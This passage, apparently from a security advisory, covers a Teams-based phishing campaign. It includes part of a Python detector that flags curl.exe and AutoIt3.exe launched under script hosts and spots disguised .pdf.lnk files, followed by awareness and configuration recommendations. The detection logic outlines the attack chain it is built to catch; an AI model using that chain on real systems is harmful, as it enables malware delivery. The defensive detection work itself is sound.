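        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        out.append(image_name(ev["image"]))
    return out


def detect_script_host_chain(events):
    """Flag curl.exe / AutoIt3.exe processes that descend from a script host.
    Each finding records the offending pid, its image, the script host it
    descends from and its command line."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = image_name(e["image"])
        if name not in SUSPICIOUS_DESCENDANTS:
            continue
        host = next((a for a in ancestor_images(e["pid"], by_pid) if a in SCRIPT_HOSTS), None)
        if host:
            findings.append({"pid": e["pid"], "image": name, "via": host, "cmd": e["cmd"]})
    return findings


if __name__ == "__main__":
    print(scan_archive_listing(["Changes_to_HR_Policy.pdf.lnk", "readme.txt"]))
    for f in detect_script_host_chain(EVENTS):
        print(f"pid {f['pid']}: {f['image']} under {f['via']}: {f['cmd']}")
```

The ancestry walk rather than a direct parent check matters here: curl.exe is launched by the VBScript under wscript.exe, but an intermediate cmd.exe or the same script host spawning AutoIt later should still be attributed to the script host. The same logic ports directly to a SIEM query over process-creation events with pid/ppid fields.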

The malware supports a range of malicious activities, including remote access tooling, cryptocurrency mining, keylogging and a built-in stealer.

Security Awareness in Microsoft Teams

Microsoft Teams, by default, permits external third parties to engage in communication through its platform. While many training resources focus on email as a potential threat vector, it’s crucial to educate your user base about the risks associated with external communications in Teams as well.

It’s worth noting that even with security measures like Microsoft Safe Links and Safe Attachments in place, they may not provide complete protection against all types of threats. As seen in the incident investigated by Truesec, there can still be vulnerabilities and risks to address. Therefore, a multi-layered security approach that includes user awareness and training is essential to bolster your organisation’s defence against evolving threats in platforms like Microsoft Teams.

Emerging Phishing Threats: What’s The Impact?

This particular phishing campaign is still in its early days.

Given the limited range of mitigation methods currently available and the probability that users have not been adequately trained to recognise this specific threat vector, they may be more susceptible to this tactic compared to traditional email-based attacks.

Solace Cyber Recommendations

Educating staff about this specific threat vector is crucial. Prioritise raising awareness, similar to efforts against email phishing attacks.

Given the restricted options for mitigation, it’s advisable to review external messaging permissions. Administrators can create an allow list of specific organisations permitted to communicate with your tenant or, alternatively, block all third-party communications.

Additionally, conduct a comprehensive gap analysis of your existing AV (Antivirus) and EDR (Endpoint Detection and Response) solutions to ensure that all endpoints have functioning and up-to-date protection.
